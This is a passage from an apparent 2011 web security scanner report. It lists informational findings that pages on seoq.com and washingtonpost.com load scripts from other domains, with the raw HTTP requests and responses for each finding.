User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:58 GMT
Server: Apache
Set-Cookie: PHPSESSID=fgl2jovfcb50uf72m2fkieceq6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.65. http://www.seoq.com/wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=7uj7e9ldpg45knc7fkags98qi0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.66. http://www.seoq.com/wp-content/uploads/2008/08/target.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/target.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:57 GMT
Server: Apache
Set-Cookie: PHPSESSID=mpoko4q3f16vbpjlk8pjk1d350; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.67. http://www.seoq.com/wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=pbhe1jtfilvbh1gnd13tgl5r87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.68. http://www.seoq.com/wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=q3oq59gdqk5qddjugp1t6q68v6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.69. http://www.seoq.com/wp-content/uploads/2008/09/search-statistics.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/search-statistics.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/09/search-statistics.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=g6ot4dlqueel2sdr2ham4iut67; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.70. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=lmg6fbb6836tkiuk0pjr3evdb1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.71. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=795fl6vdjvfli5lse7vr7r06p0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.72. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=tr4ndjjlpd3e82sbn9f6m8d2r7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.73. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=m02j41rctmjgo8tsvi3hbfo097; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.74. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=f1qmk0sk5uki5li2ehj6rqc7b0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.75. http://www.seoq.com/wp-content/uploads/2008/10/google-stock-rebound.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/google-stock-rebound.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/10/google-stock-rebound.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=ns0b5okivesekmg9ppqr13q891; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.76. http://www.seoq.com/wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=vfiqd2ekptb8ecvbrq2rprvk87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.77. http://www.seoq.com/wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=ep58rjkns66nvt4jbkb8qb8jd2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.78. http://www.seoq.com/wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=mh811o08atu0mld55rag6g7c94; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.79. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</script>

<script src="https://js.revsci.net/gateway/gw.js?csid=J05531"></script>
...[SNIP]...
</div>        
   
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

24.80. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/html/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-adv/jobs4/html/xd_receiver.htm HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wpni_poe=true; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html
Expires: Sun, 01 May 2011 23:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Cross-Domain Receiver Page</tit
...[SNIP]...
<body> <script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js?2" type="text/javascript"></script>
...[SNIP]...

24.81. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnav_v2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnav_v2.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-srv/ssi/globalnav/js/channelnav_v2.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Tue, 31 Aug 2010 17:32:50 GMT
ETag: "ac8f-4c7d3cc2"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 44175

document.write('<link href="http://www.washingtonpost.com/wp-srv/ssi/globalnav/css/wp_global_nav.css" rel="stylesheet" media="all"/>');
document.write('<link href="http://www.washingtonpost.com/wp-sr
...[SNIP]...
</p>';
//out+= '<script src="https://WaPo.netmng.com/?aid=069" type="text/javascript" language="javascript" defer="defer"></script>
...[SNIP]...

24.82. http://www.whosampled.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
